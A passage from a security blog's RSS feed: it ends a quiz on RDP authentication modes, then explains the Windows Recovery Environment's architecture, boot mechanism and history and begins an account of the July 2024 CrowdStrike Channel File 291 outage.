  { q: &quot;What is the central trade-off between Restricted Admin and Remote Credential Guard?&quot;, a: &quot;Restricted Admin gives up SSO and multi-hop in exchange for universality (any negotiable authentication); Remote CG keeps SSO and multi-hop in exchange for Kerberos-only routing and an extra RPC per downstream hop.&quot; },
  { q: &quot;Why does PRT-over-RDP not need CredSSP?&quot;, a: &quot;Because RDS-AAD-Auth replaces the CredSSP exchange with TLS plus RDS-AAD-Auth PDUs carrying an Entra-issued PRT-cookie; there is no SPNEGO, no Kerberos, and no NTLM on the wire.&quot; },
  { q: &quot;What is the residual attack class for Restricted Admin?&quot;, a: &quot;RBCD against TERMSRV: any principal that can write msDS-AllowedToActOnBehalfOfOtherIdentity on the target&apos;s computer object can S4U2self+S4U2proxy a TERMSRV ticket and RDP in as anyone.&quot; },
  { q: &quot;What is the SYSTEM-on-target floor?&quot;, a: &quot;The architectural property that any RDP mode preserving the user&apos;s identity on the target permits a SYSTEM adversary on the target to impersonate the user via OpenProcessToken and ImpersonateLoggedOnUser for the connection&apos;s duration.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>rdp</category><category>credssp</category><category>remote-credential-guard</category><category>restricted-admin</category><category>entra-id</category><category>pass-the-hash</category><category>windows-security</category><category>authentication</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Day 8.5 Million Devices Couldn&apos;t Boot -- and How Microsoft Rebuilt Recovery as a Security Surface</title><link>https://paragmali.com/blog/the-day-85-million-devices-couldnt-boot----and-how-microsoft/</link><guid isPermaLink="true">https://paragmali.com/blog/the-day-85-million-devices-couldnt-boot----and-how-microsoft/</guid><description>The Windows Recovery Environment worked perfectly on July 19, 2024. That was the problem. How WinRE, Quick Machine Recovery, and the Windows Resiliency Initiative re-priced fleet-scale recovery.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
**On July 19, 2024, the Windows Recovery Environment worked exactly as designed -- and that was the problem.** WinRE assumed a human operator per machine, and CrowdStrike&apos;s Channel File 291 priced that assumption at 8.5 million endpoints. The Windows Resiliency Initiative -- Quick Machine Recovery, MVI 3.0, the user-mode endpoint security platform, Intune-surfaced WinRE state, Point-in-Time Restore, and Cloud Rebuild -- is Microsoft&apos;s first systemic admission that the recovery path is part of the security architecture. This article maps the architecture, the program, and the trade-off it cannot remove.
&lt;h2&gt;1. A Fleet That Cannot Boot Itself&lt;/h2&gt;
&lt;p&gt;At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 to its Falcon sensor on Windows. Forty-eight minutes later -- 04:57 UTC, give or take an hour depending on which time zone the failing devices happened to wake into -- the calls began. By the time CrowdStrike reverted the file at 05:27 UTC, roughly 8.5 million Windows endpoints were stuck in a bug-check loop on &lt;code&gt;csagent+0xe14ed&lt;/code&gt;: a read-out-of-bounds page fault inside a kernel-mode driver registered as &lt;code&gt;SERVICE_SYSTEM_START&lt;/code&gt; (&lt;code&gt;Start=1&lt;/code&gt;), so it reloaded on every reboot [@crowdstrike-tech-details, @ms-security-jul27, @ms-crowdstrike-jul20].&lt;/p&gt;
&lt;p&gt;The fix was published almost immediately. &quot;Boot to Safe Mode,&quot; it said. &quot;Delete &lt;code&gt;C-00000291*.sys&lt;/code&gt;. Reboot.&quot; If the volume was &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt;-encrypted, find the recovery key first [@ms-kb5042421]. The instruction was technically correct. It was also a procedure for one machine. The Windows Recovery Environment that the procedure depended on -- WinRE -- worked exactly as it was designed to work, on every one of those 8.5 million devices [@ms-crowdstrike-jul20]. That was the problem.&lt;/p&gt;
&lt;p&gt;Think about the engineering. The recovery partition was where it should be. The Boot Configuration Data store pointed at the right &lt;code&gt;winre.wim&lt;/code&gt;. The two-failed-boots trigger fired. The blue Safe Mode tile rendered. The keyboard input handler took keystrokes. The NTFS read-write driver inside WinRE deleted the bad channel file. The reboot succeeded. Every line of code in the recovery path behaved exactly as the engineers in Redmond had specified. The architecture did not break.&lt;/p&gt;
&lt;p&gt;What broke was the architecture&apos;s central assumption: that a person would be sitting in front of the screen.&lt;/p&gt;
&lt;p&gt;The assumption was a security choice as much as a usability choice, and that the cost of that choice was a denial-of-service event measured not in seconds of downtime but in person-days of triage. What follows: the WinRE architecture as it actually exists on every Windows 11 device today, the lineage that produced that architecture, the failure mode that priced the architecture&apos;s blind spot, and the Windows Resiliency Initiative that Microsoft began assembling in the months after the incident.&lt;/p&gt;
&lt;p&gt;A second thesis follows from the first. &lt;em&gt;Recoverability is a security property.&lt;/em&gt; A platform that cannot recover at scale cannot guarantee availability; a platform that cannot guarantee availability cannot keep its confidentiality and integrity promises either, because operations teams in the middle of a fleet-down event will eventually pull every encryption layer and every signing check that gets in their way. The two halves of the CIA triad we usually study -- confidentiality and integrity -- have spent decades crowding out the third. CrowdStrike forced the third one back onto the page.&lt;/p&gt;
&lt;p&gt;If WinRE worked perfectly on July 19, 2024, what does it actually do? And how did a recovery primitive end up being the architecture&apos;s single point of human dependence? Those questions are next.&lt;/p&gt;
&lt;h2&gt;2. The Architecture: WinRE, &lt;code&gt;winre.wim&lt;/code&gt;, &lt;code&gt;boot.sdi&lt;/code&gt;, ReAgentC&lt;/h2&gt;
&lt;p&gt;Before we explain how WinRE failed at scale, we have to be precise about what WinRE &lt;em&gt;is&lt;/em&gt;. Most engineers know it as the screen that appears after two bad boots. That description is correct and unhelpful. WinRE is a Windows Preinstallation Environment image -- &lt;code&gt;winre.wim&lt;/code&gt; -- backed by a system deployment image ramdisk and managed by &lt;code&gt;ReAgentC.exe&lt;/code&gt;, registered with the Windows Boot Manager via an entry in the Boot Configuration Data store [@ms-winre-tech-ref, @ms-reagentc, @ms-bcd]. Each of those four moving pieces does one job; together they make the recovery surface possible.&lt;/p&gt;

A small, self-contained Windows operating system used to install, deploy, and repair Windows desktop editions and Windows Server [@ms-winpe-intro]. WinPE is the substrate of Windows Setup, the install media&apos;s `boot.wim`, and `winre.wim`. The base image requires 512 MB of RAM and automatically reboots after 240 hours of continuous use on Windows 10 1803 and later [@ms-winpe-intro]. Originally released to manufacturing in 2002 by a Microsoft team that included Vijay Jayaseelan, Ryan Burkhardt, and Richard Bond [@wiki-winpe].

A small image-format file that the Windows Boot Manager uses to allocate a RAM disk into which a WIM image can be mounted at boot time. The WinRE BCD entry references `boot.sdi` through a `ramdiskoptions` element; the `osdevice` element then names `winre.wim` as the image to mount inside that RAM disk [@ms-bcd, @ms-winre-tech-ref].

The binary database that replaced `boot.ini` in Windows Vista. The BCD lives on the EFI System Partition on UEFI machines and is the data structure the boot manager reads to decide what to boot. Each entry is a typed collection of *elements* -- `device`, `osdevice`, `path`, `winpe`, `ramdiskoptions`, `recoverysequence`, and others -- manipulated with `bcdedit.exe` [@ms-bcd].

A dedicated GPT partition holding `winre.wim`, identified by partition Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and recommended for placement immediately after the Windows partition. The minimum size is 300 MB, with 250 MB of free space recommended to accommodate future updates [@ms-uefi-gpt]. On Image Configuration Designer media, this partition is the default layout; clean Setup may instead use a `\Recovery\WindowsRE` folder inside the Windows partition [@ms-winre-tech-ref].
&lt;p&gt;Restated in the order a practitioner encounters them on disk, the four pieces are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The recovery partition.&lt;/strong&gt; The default UEFI/GPT layout from the Image Configuration Designer places a Windows RE Tools partition after the Windows partition, sized to hold &lt;code&gt;winre.wim&lt;/code&gt; with headroom for cumulative-update growth [@ms-uefi-gpt]. The GPT Type ID &lt;code&gt;DE94BBA4-06D1-4D40-A16A-BFD50179D6AC&lt;/code&gt; lets &lt;code&gt;bootmgr&lt;/code&gt; find the partition without depending on the Windows volume&apos;s drive letter. A &lt;code&gt;\Recovery\WindowsRE&lt;/code&gt; folder inside the OS volume is an equally valid alternative; some OEMs use one, some the other.The variability is invisible at runtime: &lt;code&gt;bootmgr&lt;/code&gt; follows the BCD, not the disk layout. But it matters at provisioning time. Always check &lt;code&gt;reagentc /info&lt;/code&gt; after deployment to know which arrangement you have, because the &lt;em&gt;Microsoft-recommended fix for &quot;winre.wim is too small after a cumulative update&quot;&lt;/em&gt; (KB5028997) depends on which partition the image lives in.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;&lt;code&gt;winre.wim&lt;/code&gt;.&lt;/strong&gt; A customised WinPE image. The lineage goes back to Windows PE 1.0, RTMed in 2002 from Windows XP RTM [@wiki-winpe]. Today&apos;s &lt;code&gt;winre.wim&lt;/code&gt; is built from Windows 10 / 11&apos;s WinPE 10 line and includes the recovery shell, Startup Repair, System Restore (when enabled on the host), command prompt, and a curated list of optional drivers. The base image still inherits the WinPE rules: 512 MB minimum RAM, 240-hour reboot cap on Windows 10 1803+ [@ms-winpe-intro].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;&lt;code&gt;boot.sdi&lt;/code&gt;.&lt;/strong&gt; Sits on the recovery partition (or in &lt;code&gt;\Recovery\WindowsRE\&lt;/code&gt;) and acts as a fixed-size container into which the boot manager creates a RAM disk at boot time [@ms-bcd].The &lt;code&gt;.sdi&lt;/code&gt; extension stands for *System Deployment Image*, the same file format used by older Windows Deployment Services workflows in which a thin ramdisk holds a &lt;code&gt;boot.wim&lt;/code&gt; for PXE installs. The RAM disk is where &lt;code&gt;winre.wim&lt;/code&gt; is mounted. &lt;code&gt;boot.sdi&lt;/code&gt; is small (a few megabytes), unmodifiable in normal operation, and one of the parsers later abused by the BitUnlocker chain [@ms-bitunlocker-blog]; we return to that in Section 9.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;&lt;code&gt;ReAgentC.exe&lt;/code&gt;.&lt;/strong&gt; The in-box management tool. Microsoft Learn documents the supported switches: &lt;code&gt;/info&lt;/code&gt;, &lt;code&gt;/enable&lt;/code&gt;, &lt;code&gt;/disable&lt;/code&gt;, &lt;code&gt;/setreimage /Path &amp;lt;Folder&amp;gt;&lt;/code&gt;, &lt;code&gt;/boottore&lt;/code&gt;, &lt;code&gt;/setbootshelllink&lt;/code&gt;, and the now-deprecated &lt;code&gt;/setosimage&lt;/code&gt; (no longer used on Windows 10 or later) [@ms-reagentc]. The same page notes that for &lt;em&gt;offline&lt;/em&gt; operations on WinPE 2.x/3.x/4.x images, administrators must instead use &lt;code&gt;Winrecfg.exe&lt;/code&gt; from the Windows Assessment and Deployment Kit -- a clue that the &lt;em&gt;online&lt;/em&gt; mode of &lt;code&gt;ReAgentC.exe&lt;/code&gt; predated the offline mode. The tool has shipped since at least Windows 7; the precise RTM month is not surfaced on Microsoft Learn today.The web is full of confident claims that &lt;code&gt;ReAgentC.exe&lt;/code&gt; first shipped in Vista, Windows 7, or Windows 8. The safe attribution is &quot;Windows 7 onwards&quot; because that is the era when the recovery-partition + ReAgentC model became the supported default. Microsoft Learn does not name an exact ship version, and the AI summaries that do are inferring from circumstantial evidence [@ms-reagentc].&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;All four pieces have to cooperate at the worst possible moment: when the Windows partition refuses to boot. The question for the next section is the literal handoff. How does the firmware end up running &lt;code&gt;winre.wim&lt;/code&gt;?&lt;/p&gt;
&lt;h2&gt;3. The Mechanism: How a WinRE Boot Actually Happens&lt;/h2&gt;
&lt;p&gt;There is a sentence that appears in dozens of TechNet-era guides and AI summaries: &lt;em&gt;Windows boots WinRE by running &lt;code&gt;winload.exe /recovery&lt;/code&gt;.&lt;/em&gt; That sentence is wrong. There is no &lt;code&gt;/recovery&lt;/code&gt; switch on &lt;code&gt;winload.efi&lt;/code&gt; or &lt;code&gt;winload.exe&lt;/code&gt;. The BCD Boot Options Reference enumerates every legal element on a boot entry, and &lt;code&gt;recoverysequence&lt;/code&gt; is one of them; a command-line switch with that name is not [@ms-bcd]. WinRE is selected through the BCD, not through a flag passed to the loader.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The BCD Boot Options Reference defines every element on a boot entry: &lt;code&gt;device&lt;/code&gt;, &lt;code&gt;osdevice&lt;/code&gt;, &lt;code&gt;path&lt;/code&gt;, &lt;code&gt;description&lt;/code&gt;, &lt;code&gt;recoverysequence&lt;/code&gt;, &lt;code&gt;winpe&lt;/code&gt;, &lt;code&gt;ramdisksdidevice&lt;/code&gt;, &lt;code&gt;ramdisksdipath&lt;/code&gt;, and a few dozen others [@ms-bcd]. None of them is exposed as a &lt;code&gt;winload.exe /recovery&lt;/code&gt; command-line flag. The recovery handoff happens entirely inside the boot manager, before &lt;code&gt;winload.efi&lt;/code&gt; ever runs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Walk the literal boot sequence on a UEFI machine [@ms-winre-tech-ref, @ms-bcd]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Firmware passes control to &lt;code&gt;bootmgfw.efi&lt;/code&gt; on the EFI System Partition. (On legacy BIOS, it would be &lt;code&gt;bootmgr&lt;/code&gt; from the active partition.)&lt;/li&gt;
&lt;li&gt;The boot manager reads the BCD store. There is one entry of type &lt;em&gt;Windows Boot Manager&lt;/em&gt; and one or more entries of type &lt;em&gt;Windows Boot Loader&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;The OS loader entry carries an element called &lt;code&gt;recoverysequence&lt;/code&gt;, set to the GUID of a &lt;em&gt;separate&lt;/em&gt; BCD entry. That separate entry is the WinRE configuration.&lt;/li&gt;
&lt;li&gt;On a normal boot, the boot manager loads the OS entry&apos;s &lt;code&gt;path&lt;/code&gt; (&lt;code&gt;\Windows\System32\winload.efi&lt;/code&gt;) against the OS volume named in &lt;code&gt;device&lt;/code&gt;/&lt;code&gt;osdevice&lt;/code&gt;, and &lt;code&gt;winload.efi&lt;/code&gt; brings up the kernel.&lt;/li&gt;
&lt;li&gt;On a recovery trigger -- two failed boots, a corrupted system file, an explicit &lt;code&gt;reagentc /boottore&lt;/code&gt;, or the user choosing &lt;em&gt;Restart&lt;/em&gt; from the Advanced Startup menu -- the boot manager instead follows &lt;code&gt;recoverysequence&lt;/code&gt; to the WinRE entry.&lt;/li&gt;
&lt;li&gt;The WinRE entry&apos;s elements look like this: &lt;code&gt;winpe Yes&lt;/code&gt;, &lt;code&gt;osdevice ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}&lt;/code&gt;, &lt;code&gt;device ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}&lt;/code&gt;, and &lt;code&gt;path \Windows\System32\Boot\winload.efi&lt;/code&gt;. The &lt;code&gt;ramdiskoptions&lt;/code&gt; element it points to in turn carries &lt;code&gt;ramdisksdidevice&lt;/code&gt; and &lt;code&gt;ramdisksdipath&lt;/code&gt; (&lt;code&gt;\Recovery\WindowsRE\boot.sdi&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;The boot manager creates a RAM disk backed by &lt;code&gt;boot.sdi&lt;/code&gt;, mounts &lt;code&gt;winre.wim&lt;/code&gt; inside it, and starts &lt;code&gt;winload.efi&lt;/code&gt; against that ramdisk. From &lt;code&gt;winload.efi&lt;/code&gt;&apos;s point of view, the OS being booted is the one inside &lt;code&gt;winre.wim&lt;/code&gt;. The kernel comes up in the RAM disk and presents the Windows RE entry-point UI.&lt;/li&gt;
&lt;/ol&gt;

flowchart TD
    F[UEFI firmware] --&amp;gt; BM[bootmgfw.efi on ESP]
    BM --&amp;gt; BCD[Read BCD store]
    BCD --&amp;gt; CHK{Trigger fired?}
    CHK -- No --&amp;gt; OS[OS loader entry, winload.efi, Windows partition]
    CHK -- Yes --&amp;gt; RS[Follow recoverysequence GUID]
    RS --&amp;gt; WRE[WinRE BCD entry: winpe Yes, osdevice ramdisk=...winre.wim]
    WRE --&amp;gt; RD[Allocate RAM disk from boot.sdi]
    RD --&amp;gt; MNT[Mount winre.wim into RAM disk]
    MNT --&amp;gt; WL[winload.efi loads WinPE kernel]
    WL --&amp;gt; UX[WinRE entry-point UI]
&lt;p&gt;The five auto-trigger conditions are enumerated verbatim in the Windows RE Technical Reference [@ms-winre-tech-ref]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Two consecutive failed attempts to start Windows.&lt;/li&gt;
&lt;li&gt;Two consecutive unexpected shutdowns within two minutes of boot completion.&lt;/li&gt;
&lt;li&gt;Two consecutive system reboots within two minutes of boot completion.&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; error (except for issues related to &lt;code&gt;Bootmgr.efi&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;A BitLocker error on touch-only devices.&lt;/li&gt;
&lt;/ol&gt;

flowchart LR
    A[Two failed boots] --&amp;gt; ENT[Enter WinRE]
    B[Two unexpected shutdowns within 2 min of boot] --&amp;gt; ENT
    C[Two reboots within 2 min of boot] --&amp;gt; ENT
    D[Secure Boot error -- not Bootmgr.efi] --&amp;gt; ENT
    E[BitLocker error on touch-only device] --&amp;gt; ENT
&lt;p&gt;Walking the BCD elements themselves makes the absence of any &lt;code&gt;/recovery&lt;/code&gt; switch visible. Here is a minimal model of what the boot manager actually consumes.&lt;/p&gt;
&lt;p&gt;{`
// Paraphrased from the BCD Boot Options Reference. Real bcdedit output is text,
// but the boot manager reads it as a typed key/value store.&lt;/p&gt;
&lt;p&gt;const bcd = {
  bootmgr: {
    type: &apos;Windows Boot Manager&apos;,
    default: &apos;{current}&apos;,
    displayorder: [&apos;{current}&apos;],
  },
  &apos;{current}&apos;: {
    type: &apos;Windows Boot Loader&apos;,
    device: &apos;partition=C:&apos;,
    osdevice: &apos;partition=C:&apos;,
    path: &apos;\\Windows\\system32\\winload.efi&apos;,
    description: &apos;Windows 11&apos;,
    recoverysequence: &apos;{a1b2-...-winre-guid}&apos;,
    recoveryenabled: &apos;Yes&apos;,
  },
  &apos;{a1b2-...-winre-guid}&apos;: {
    type: &apos;Windows Boot Loader&apos;,
    device: &apos;ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}&apos;,
    osdevice: &apos;ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}&apos;,
    path: &apos;\\Windows\\system32\\Boot\\winload.efi&apos;,
    description: &apos;Windows Recovery Environment&apos;,
    winpe: &apos;Yes&apos;,
    nx: &apos;OptIn&apos;,
  },
  &apos;{ramdiskopts}&apos;: {
    type: &apos;Device Options&apos;,
    description: &apos;Ramdisk Options&apos;,
    ramdisksdidevice: &apos;partition=\\Device\\HarddiskVolume4&apos;,
    ramdisksdipath: &apos;\\Recovery\\WindowsRE\\boot.sdi&apos;,
  },
};&lt;/p&gt;
&lt;p&gt;// The boot manager picks one of these entries, depending on whether
// recoverysequence has been activated. No command-line flag is involved.&lt;/p&gt;
&lt;p&gt;function bootDecision(failureCount, secureBootError, bitlockerError) {
  if (failureCount &amp;gt;= 2 || secureBootError || bitlockerError) {
    const winreGuid = bcd[&apos;{current}&apos;].recoverysequence;
    return bcd[winreGuid];
  }
  return bcd[&apos;{current}&apos;];
}&lt;/p&gt;
&lt;p&gt;const chosen = bootDecision(2, false, false);
console.log(&apos;Loader path the boot manager invokes:&apos;);
console.log(&apos;  &apos; + chosen.path);
console.log(&apos;Backing device:&apos;);
console.log(&apos;  &apos; + chosen.osdevice);
console.log(&apos;winpe flag (Yes means &quot;boot a WIM into a ramdisk&quot;):&apos;);
console.log(&apos;  &apos; + (chosen.winpe || &apos;(unset, normal OS boot)&apos;));
`}&lt;/p&gt;
&lt;p&gt;That is the entire mechanism. Two failed boots flip an in-BCD counter; the boot manager follows &lt;code&gt;recoverysequence&lt;/code&gt; instead of the default loader path; the WinRE entry mounts &lt;code&gt;winre.wim&lt;/code&gt; in a RAM disk; the kernel inside &lt;code&gt;winre.wim&lt;/code&gt; comes up. No flags, no shells, no scripts.&lt;/p&gt;
&lt;p&gt;Now we know what WinRE is and how it boots. The remaining historical question is how this architecture &lt;em&gt;came to be&lt;/em&gt;, and what about it did not change between 2007 and July 19, 2024.&lt;/p&gt;
&lt;h2&gt;4. Historical Origins: From the Recovery Console to the Recovery Partition (2000-2012)&lt;/h2&gt;
&lt;p&gt;Every architectural choice in WinRE was a response to something that did not work the year before. Walk the four pre-WRI generations of Windows recovery and the story is one long relaxation of the assumption that recovery requires physical media.&lt;/p&gt;
&lt;h3&gt;Generation 1: Emergency Repair Disk (NT 3.x and 4.0, 1993-2000)&lt;/h3&gt;
&lt;p&gt;A floppy disk plus a &lt;code&gt;%SystemRoot%\repair&lt;/code&gt; directory contained snapshotted SYSTEM, SOFTWARE, SAM, and SECURITY registry hives [@wiki-recovery-console]. The administrator booted from the three Windows NT Setup floppies, pressed &lt;code&gt;R&lt;/code&gt; for Repair, fed the floppy when prompted, and Setup wrote the snapshotted hives back over the damaged on-disk copies. ERD repaired the registry, nothing more. If &lt;code&gt;NTOSKRNL.EXE&lt;/code&gt; itself was missing, the operator was reduced to a DOS floppy plus &lt;code&gt;EXPAND&lt;/code&gt; from the install CD. The architecture&apos;s failure mode was the obvious one for a floppy-based snapshot system: the floppy got lost; the snapshot was stale; the scope was too narrow.&lt;/p&gt;

The Windows NT 3.x and 4.0 recovery mechanism: a snapshot of the registry hives written to a floppy by `RDISK.EXE` plus a small `%SystemRoot%\repair` folder. Restored only the registry; required the NT Setup floppies to boot. Wikipedia&apos;s *Recovery Console* article identifies the Recovery Console as ERD&apos;s successor [@wiki-recovery-console].
&lt;h3&gt;Generation 2: Recovery Console (Windows 2000, February 17, 2000)&lt;/h3&gt;
&lt;p&gt;The Recovery Console replaced the binary &quot;restore the snapshot&quot; decision with a programmable shell. Boot from the Windows 2000 or XP install CD; choose Repair; the operator landed in a &lt;code&gt;cmd.exe&lt;/code&gt;-shaped environment with around three dozen internal commands: &lt;code&gt;copy&lt;/code&gt;, &lt;code&gt;del&lt;/code&gt;, &lt;code&gt;attrib&lt;/code&gt;, &lt;code&gt;chkdsk&lt;/code&gt;, &lt;code&gt;fixboot&lt;/code&gt;, &lt;code&gt;fixmbr&lt;/code&gt;, &lt;code&gt;bootcfg&lt;/code&gt;, and the rest [@wiki-recovery-console]. Authentication required the local Administrator password; filesystem access was sharply constrained (read-only by default; on the boot volume only the root and &lt;code&gt;%SystemRoot%&lt;/code&gt; were writable, unless Group Policy relaxed those limits).&lt;/p&gt;

The Windows 2000/XP/Server 2003 command-line repair shell. Initial release February 17, 2000; superseded by the Windows Recovery Environment in Windows Vista. Loadable from the install CD or installable as a startup option via `winnt32 /cmdcons`. Wikipedia lists Windows Recovery Environment as its named successor [@wiki-recovery-console].
&lt;p&gt;The Recovery Console did not fail technically. It failed &lt;em&gt;culturally&lt;/em&gt;. By 2005 the Windows administrator population had shifted decisively to GUI tools. A 2005 user with a corrupt &lt;code&gt;WINLOAD.EXE&lt;/code&gt; and no install CD had no path to repair the box without buying replacement media. There was no automatic-repair logic and no on-disk presence; the install CD was always required, and every fix demanded muscle memory the typical administrator no longer had.&lt;/p&gt;
&lt;h3&gt;Generation 3: WinRE on Installation Media (Windows Vista, January 2007)&lt;/h3&gt;
&lt;p&gt;Vista shipped a full GUI recovery environment built on the brand-new Windows PE 2.0 [@wiki-winpe]. &lt;code&gt;winre.wim&lt;/code&gt; carried Startup Repair (a probe-and-fix playbook for boot failures), System Restore (now backed by the Volume Shadow Copy Service), Complete PC Restore, Windows Memory Diagnostic, and a command prompt for the cases nothing else fit. Vista was also the version that introduced the Boot Configuration Data store and &lt;code&gt;bootmgr&lt;/code&gt;, replacing &lt;code&gt;NTLDR&lt;/code&gt; and the plain-text &lt;code&gt;boot.ini&lt;/code&gt; [@ms-bcd]. The same BCD that today still routes the recovery handoff was written for Vista.The Microsoft Learn &quot;Vista WinRE Overview&quot; page in the previous-versions archive (&lt;code&gt;cc766056&lt;/code&gt;) is now misdirected and renders an unrelated USMT migration topic instead of the original article. The load-bearing claim that WinRE was introduced in Vista is independently supported by the Windows PE Wikipedia article&apos;s version table (WinPE 2.0 built from Vista RTM) and by Microsoft Learn&apos;s &lt;em&gt;Push-button reset overview&lt;/em&gt;, which dates Push-Button Reset to Windows 8 and frames it as built on the existing WinRE architecture [@wiki-winpe, @ms-pbr-overview].&lt;/p&gt;
&lt;p&gt;Vista WinRE had two architectural problems that the next generation fixed. OEMs were free to put &lt;code&gt;winre.wim&lt;/code&gt; wherever they wanted on disk; there was no standard partition. And the install DVD remained the fallback for any user whose OEM had not pre-installed WinRE -- which, by 2010, was most users, none of whom still owned the DVD.&lt;/p&gt;
&lt;p&gt;System Restore is itself a sub-thread worth noting. It first shipped in Windows ME (year 2000), was re-implemented atop VSS in Vista, and remained off by default on Windows 10 and 11 [@wiki-system-restore]. The Vista move made it callable from WinRE even when the host Windows would not boot -- a property that, twenty-five years later, Point-in-Time Restore is re-engineering for the cloud.&lt;/p&gt;
&lt;h3&gt;Generation 4: Recovery Partition + ReAgentC + BCD &lt;code&gt;recoverysequence&lt;/code&gt; (Windows 7, 2009; standardised in Windows 8 and beyond)&lt;/h3&gt;
&lt;p&gt;This is the architecture every Windows 11 device still runs.&lt;/p&gt;
&lt;p&gt;Windows 7 dropped &lt;code&gt;winre.wim&lt;/code&gt; onto a dedicated recovery partition with a GPT Type ID that lets &lt;code&gt;bootmgr&lt;/code&gt; find it without depending on the Windows volume&apos;s drive letter [@ms-uefi-gpt]. &lt;code&gt;ReAgentC.exe&lt;/code&gt; became the in-box management tool [@ms-reagentc]. The BCD &lt;code&gt;recoverysequence&lt;/code&gt; element became the mechanism by which the OS loader entry points at the WinRE entry. The two-failed-boots trigger entered the Windows RE Technical Reference&apos;s enumeration of automatic conditions [@ms-winre-tech-ref].&lt;/p&gt;
&lt;p&gt;Generation 4 &lt;em&gt;did not fail&lt;/em&gt;. The five auto-trigger conditions still fire on Windows 11 24H2. ReAgentC&apos;s switches are still the supported management surface. The recovery-partition GPT Type ID is still &lt;code&gt;DE94BBA4-06D1-4D40-A16A-BFD50179D6AC&lt;/code&gt;. It is the architectural floor every later generation extends, including Quick Machine Recovery.&lt;/p&gt;
&lt;p&gt;What Generation 4 &lt;em&gt;did not solve&lt;/em&gt; was the cost of recovery at fleet scale. WinRE-on-disk handled one machine perfectly; it had nothing to say about ten thousand machines, each still bounded by the time it took to walk to a desk.&lt;/p&gt;

gantt
    dateFormat YYYY
    axisFormat %Y
    section Pre-WinRE
    Emergency Repair Disk (NT 3.x / 4.0)         :1993, 2000
    Recovery Console (Windows 2000 onwards)      :2000, 2008
    section WinRE
    WinRE on installation media (Vista)          :2007, 2009
    Recovery partition + ReAgentC (still current) :2009, 2026
    section Recovery flavours
    Push-Button Reset (Windows 8 onwards)        :2012, 2026
    Autopilot Reset (Win 10 1709)                :2017, 2026
    Quick Machine Recovery (24H2)                :2025, 2026
    Intune Remote Recovery / Cloud Rebuild        :2025, 2026
&lt;p&gt;A few parallel paths deserve naming. Push-Button Reset, introduced in Windows 8 in 2012, gave consumers an in-WinRE &quot;Refresh&quot; or &quot;Reset&quot;; image-less reset in Windows 10 and Cloud Download in Windows 10 version 2004 (May 2020) made the reset progressively less dependent on locally-staged install images [@ms-pbr-overview]. Autopilot Reset, shipped in Windows 10 1709 (October 2017), let Intune issue an MDM-initiated wipe-and-rebuild that preserved the device&apos;s Entra ID join. Microsoft Diagnostics and Recovery Toolset (DaRT) -- the descendant of Winternals ERD Commander acquired in 2006 and shipped under MDOP starting July 2007 (MDOP 2007), with subsequent releases through MDOP 2008 (April 2008) -- gave Software Assurance customers a richer enterprise tool on top of WinPE [@wiki-mdop-dart]. Older recovery mechanisms quietly aged out: Last Known Good Configuration was no longer the default boot-failure response on Windows 8 onward, and the deprecated-features lifecycle framework is the canonical place to track such retirements today [@ms-deprecated].&lt;/p&gt;
&lt;p&gt;By the early 2010s, the architecture that still runs on every Windows 11 device today was largely in place [@ms-winre-tech-ref, @ms-reagentc]. None of these tools gave WinRE permission to call Windows Update from inside the recovery environment. That gap is the next chapter.&lt;/p&gt;
&lt;h2&gt;5. The Forcing Function: July 19, 2024&lt;/h2&gt;
&lt;p&gt;We know what WinRE is. We know how it boots. We can now see the CrowdStrike incident as the architecture&apos;s stress test. The headline numbers are well-rehearsed at this point; what matters here is the technical cause, the kernel-resident dependency it expressed, and the procedure Microsoft published.&lt;/p&gt;
&lt;h3&gt;The fault&lt;/h3&gt;
&lt;p&gt;CrowdStrike&apos;s Falcon sensor for Windows version 7.11, released in February 2024, introduced a new IPC Template Type used by behavioural detection logic [@crowdstrike-rca-pdf]. The Template Type &lt;em&gt;declared&lt;/em&gt; twenty-one input parameter fields. The integration code that invoked the in-driver Content Interpreter to evaluate Template Instances against host activity &lt;em&gt;supplied only twenty inputs&lt;/em&gt; [@crowdstrike-rca-pdf]. For more than four months, Channel File 291 contained no Template Instance whose criterion read the twenty-first field. That made the mismatch latent.&lt;/p&gt;
&lt;p&gt;At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 containing a Template Instance that referenced the twenty-first field with a non-wildcard matching criterion [@crowdstrike-rca-pdf, @crowdstrike-tech-details]. The Content Interpreter loaded the instance, looked up the twenty-first input pointer in its input-pointer array, and read past the end of that array. Sensors running 7.11 or later that received the update between 04:09 and 05:27 UTC tripped the latent out-of-bounds read [@crowdstrike-tech-details].&lt;/p&gt;
